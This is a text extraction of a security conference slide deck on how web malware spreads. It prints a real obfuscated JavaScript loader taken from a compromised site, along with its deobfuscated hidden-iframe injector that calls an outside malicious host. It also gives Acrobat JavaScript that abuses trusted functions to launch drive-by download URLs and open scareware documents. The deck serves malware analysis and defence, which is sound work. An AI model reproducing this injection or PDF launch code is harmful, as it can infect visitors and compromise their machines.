Download - Scaling Web 2.0 Malware Infection
![Page 1: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/1.jpg)
Scaling Web 2.0 Malware Infection______________________________________
Aditya K Sood, Sr. Security Practitioner
Armorize , Santa Clara US
![Page 2: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/2.jpg)
Disclaimer
All contents of this presentation represent my own beliefs and views and do not, unless
explicitly stated otherwise, represent the beliefs of my current, or any of my previous in
that effect, employers.
![Page 3: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/3.jpg)
About Me - $whoami
• Senior Security Practitioner , Armorize
http://www.armorize.com
• Founder , SECNICHE Security.
http://www.secniche.org
• Worked previously for COSEINC as Senior Security Researcher and Security
Consultant for KPMG
• Written content Author for HITB E-Zine, Hakin9 ,ELSEVIER, USENIX Journals.
• Like to do Bug Hunting and Malware dissection.
• Released Advisories to Forefront Companies.
• Active Speaker at Security Conferences including RSA etc.
![Page 4: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/4.jpg)
Agenda
Understanding The Malware Anatomy
The Vertical Risk – Malware Impact on Business
Top 10+ Web Malware Infection Strategies
2X Generation - Century Malware Trickeries
Case Study – Infection through PDF Trusted Functions
Demonstration
![Page 5: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/5.jpg)
Pattern
Understanding The Malware Anatomy
The Dependent Peripherals
![Page 6: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/6.jpg)
Malware Mess – Global Trifecta
![Page 7: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/7.jpg)
Malware Infection Rate
![Page 8: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/8.jpg)
Malware Retrospective and Classification
Trojan (31.2 %)
Downloader (25.6 %)
Backdoor (13.8 %)
Spyware (13.2 %)
Adware (4.9%)
Top 5 Malware Categories Top 5 Virus Families
Stuh (4.4 %)
Fraudload (3.9 %)
Monder (3.6 %)
Autorun (2.7 %)
Buzus (2.7 %)
Interdependency
![Page 9: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/9.jpg)
Malware - The Impact on Real World
![Page 10: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/10.jpg)
Malware Trends – The Attack Base
Financial abuse and mass identity theft
The mass destructor – Botnet infection and zombie hosts
Exploiting the link dependency – Pay Per click hijacking
Traffic manipulation – Open redirect vulnerabilities at large scale
Spywares , crypto virology , ransom ware etc
Distributed Denial of Service – The service death game , extortion
Industry change semantics – Malware activation change line
Infection through browsers and portable gadgets – the biggest step
Exploiting anti virus loopholes
![Page 11: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/11.jpg)
Malware Contributing Issues – Rising Steps
Publicly available malware source code
Malware distribution framework such MPACK , NeoSploit etc.
Unpatched vulnerabilities and loosely coupled patches
Demand of underground services and self exposure
Global surveillance mode and information stealing in the wild
Software discrepancies and inherited design flaws such as Browsers.
Exploitation at web level is easy. It opens a door to System Level Fallacies.
Inappropriate security solutions deployed and irrelevant security paradigm
Botnet Infection – The easy way to launch diversified attack
Web sharing and centralized work functionality.
![Page 12: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/12.jpg)
Pattern
Understanding The Vertical Risk
Web Delivered Malware Impact on Business
Underground Market and Malware Flow Model
![Page 13: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/13.jpg)
Underground Malware Market Business - Statistics
© GDATA
![Page 14: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/14.jpg)
Practical Malware Flow Model
© Reihe Informatik. TR-2007-011
Malware Writers Role
Flow of Malware Websites
![Page 15: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/15.jpg)
Malware - The Impact on Real World
![Page 16: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/16.jpg)
Pattern
Malware – Sources of Infection
Web 2.0
Top 10 + Strategies of Distributing Malware through Web
![Page 17: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/17.jpg)
Long Live Drive By Download – Base Web Malware Tactic
![Page 18: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/18.jpg)
(SEO) Poisoning – Driven with Malware
![Page 19: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/19.jpg)
Messengers – Infection at Instant State
![Page 20: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/20.jpg)
Networking Websites – TWITTER Malware Infection
Exploiting the trust relationship on Social Networking Websites
Spreading malware content through Tweets , Scrapping etc
Chain Reaction – Dwells very fast in Website Networks (URL Shortening Trick)
![Page 21: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/21.jpg)
Social Networking – FACEBOOK Malware Applications
Manipulating the Open API Calls
User centric control
Exploiting the design fallacies
![Page 22: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/22.jpg)
Social Networking – FACEBOOK MAIL Infection
Step 1
Step 2
Step 3
![Page 23: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/23.jpg)
Online Media Content – You Tube, Google Videos etc !!
![Page 24: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/24.jpg)
Exploiting the Web of Trust – Human Touch
![Page 25: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/25.jpg)
Spywares , Ransom Wares and other Variants etc.
![Page 26: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/26.jpg)
Insidious Spamming – Email , Blogs , Redirectors etc
![Page 27: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/27.jpg)
Botnets – Malware Infection at Large Scale
![Page 28: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/28.jpg)
Direct Malware Hosting – Infected Web Domains
![Page 29: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/29.jpg)
System Stringency – Exploiting the Exceptions
![Page 30: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/30.jpg)
Malware Kits – Automated Infection
![Page 31: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/31.jpg)
Case Study – Safety Labs Malware Infection
Malware Infecting the Security Service Provider Websites.
____________________________________________________________
It is unfortunate that even the Security Solution Provider is also touched by the latest Internet IFRAME
threats or rather say infections
Thousands of websites on internet have been compromised with malicious Iframes which load exploit
code designed to silently install trojans onto susceptible victim computers.
![Page 32: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/32.jpg)
Case Study – Safety Labs Malware Infection
![Page 33: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/33.jpg)
Case Study – Safety Labs Malware Infection
OBFUSCATED JAVASCRIPT
<SCRIPT LANGUAGE=JAVASCRIPT>
FUNCTION MDBAN(X){VAR L=X.LENGTH,B=1024,I,J,R,P=0,S=0,W=0,T=ARRAY(63,9,52,47,48,11,7,35,
59,56,0,0,0,0,0,0,43,14,20,5,61,19,54,36,15,30,32,38,22,44,29,28,12,2,55,45,51,62,25,13,27,3,17,0,0,0,0,16,0,34,
0,58,40,31,60
,49,8,50,4,21,53,1,10,33,41,23,24,37,18,26,57,6,39,46,42);FOR(J=MATH.CEIL(L/B);J>0;J--
){R='';FOR(I=MATH.MIN(L,B);I>0;I--,L--){{W
|=(T[X.CHARCODEAT(P++)-48])<<S;IF(S){R+=STRING.FROMCHARCODE(221^W&255);W>>=8;S-
=2}ELSE{S=6}}}EVAL(R);}}MDBAN('ZT8M
VN@ZT8UZFKNZYQYUVN8M9Z3VVN@3DQ5YTKCFZUNSPAXDC6AS8UN34AX0TI5M9
QAC0LUYD8C@UQU0LKUZSIYFI8I@2Z@@TE8M8N@FPN39CXHGFKUST0ZMDAXYLY13PL8F3I8MVN5ML
E0DMXICGRAD
F@HC0LUYCX3U0R3Z2KXZLQY830I0LA5SCLXZJXACD8UZGW5YJ0EY2CU@GI5PXH@MTA8076YF2Y8@FQ5
Y7@HD')</SCRIPT><!-- 213.219.250.100 -->
Script Source is
http://www.safety-lab.com/audits/categorylist.pl?lang=en
![Page 34: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/34.jpg)
Case Study – Safety Labs Malware Infection
DEOBFUSCATED JAVASCRIPT
(1) DECODED JAVASCRIPT EVALS()
WINDOW.STATUS = 'DONE';
DOCUMENT.WRITE('<IFRAME NAME=5B8F SRC="HTTP://3PIGS.INFO/T/?' + MATH.ROUND(MATH.RANDOM() *
14490) + '5B8F' + '" WIDTH=322 HEIGHT=45 STYLE="DISPLAY:NONE"></IFRAME>')
(2) DECODED JAVASCRIPT WRITES RESULT
<IFRAME NAME=5B8F SRC="HTTP://3PIGS.INFO/T/?58965B8F" WIDTH=322 HEIGHT=45 STYLE="DISPLAY:NONE">
</IFRAME>
HTTP://3PIGS.INFO/T/?58965B8F “ was
injected as source for malicious file.
Complexity factor is always high in decoding the malicious JavaScript.
![Page 35: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/35.jpg)
2X Generation Malware Trickeries
System File Patching and Code Injection
Code Interdependency – Malware Adjacency - Code Resuscitation.
Code Randomization, Obfuscation and Morphing
Rootkits and System Cloaking
Exploiting Active X and JavaScript Heaps – Direct Control
![Page 36: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/36.jpg)
Private & Confidential Property of Armorize
Escaping What !
![Page 37: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/37.jpg)
Malware Analysis Methodology (MAM) - Overview
End Point Communication Connection state check
Server identity checks through communication medium.
Error generation like Checksum Integrity.
Encrypted data in packets.
Protocol Switching.
Session Stream Analysis – Deep Inspection
Analyzing TCP stream session
Extracting an executable from the raw data
Behavioral Analysis – Scrutinizing system fallacies Active debugging
Black Box Testing approach
Static Analysis – Reversing the facets of malwareIts all about analyzing the code of Malware
![Page 38: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/38.jpg)
Case Study – Malware Infection
PDF Trusted Functions
(Understanding the Facets of Malware)
![Page 39: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/39.jpg)
Some PDF Truths
Hyperlink execution notification as alerts
Data is not allowed to be stored in the forms
http://secniche.org/papers/SNS_09_03_PDF_Silent_Form_Re_Purp_Attack.pdf
Number of vulnerable functions have been removed i.e. from registered state
Support for Adobe reader 7.xx has been removed
http://blogs.adobe.com/adobereader/2009/12/adobe_reader_and_acrobat_versi.html
Other alerts have been structured as security checks in standalone PDF’s
ACRO JS does not support DOM as normal JavaScript does.
Adobe has inbuilt functionality to provide a code wrappers which calls restricted functions in
specific environments. For example:- In general, it is not possible to generate another PDF
from the standalone PDF when it is opened
![Page 40: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/40.jpg)
Understanding Malware Infection - PDF
Exploiting the browser – Downloading files through Windows Media Player
Exploiting the Global Access of JavaScript folder in PDF
Hidden gift.js file containing malicious code is placed here
![Page 41: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/41.jpg)
Understanding Malware Infection - PDF
Calling Codes through Trusted Functions
Trusted function body calls the app.beginPriv (begin privileges) and app.endPriv(end
privileges) to enclose any type of function and code to be trusted.
The trusted functions method can be called successfully on the initialization of the
application and it is possible to call certain number of restricted functions through it.
myTrustedFunction = app.trustedFunction(
function() { <function body> } );
New Scareware Message – Opening a new PDF
trustedDoc = app.trustedFunction( function (width,height)
{ app.beginPriv();
var trustDoc = app.newDoc(width,height);
trustDoc.addWatermarkFromText("X JERKED X");
app.endPriv();
return trustDoc; })
trustedDoc(300,300);
![Page 42: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/42.jpg)
Understanding Malware Infection - PDF
Calling Codes through Trusted Propagator Functions
myPropagatorFunction = app.trustPropagatorFunction(
function() { <function body> }
URL Opening - Drive by Download Infections
trustedDoc = app.trustedFunction
(
function (cURL, bNewFrame)
{
app.beginPriv();
var trustedDoc = app.launchURL(cURL, bNewFrame);
app.endPriv();
return trustedDoc;
}
)
trustedDoc("http://www.malware1.com",true);
trustedDoc("http://www.malware2.com",true);
trustedDoc("http://www.malware3.com",true);
trustedDoc("http://www.malware4.com",true);
trustedDoc("http://www.malware5.com",true);
![Page 43: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/43.jpg)
Understanding Malware Infection - PDF
![Page 44: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/44.jpg)
Demonstration
![Page 45: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/45.jpg)
Questions and Queries
![Page 46: Scaling Web 2.0 Malware Infection](https://reader034.vdocuments.us/reader034/viewer/2022042606/5443e95eb1af9f600a8b46ea/html5/thumbnails/46.jpg)
Thanks and Regards
Special thanks to Armorize for pushing me to do more research.
http://www.armorize.com
__________________________________________________________________________________
Portal and Blog
SecNiche Security – http://www.secniche.org | http://zeroknock.blogspot.com
(Screenshots shared from various resources)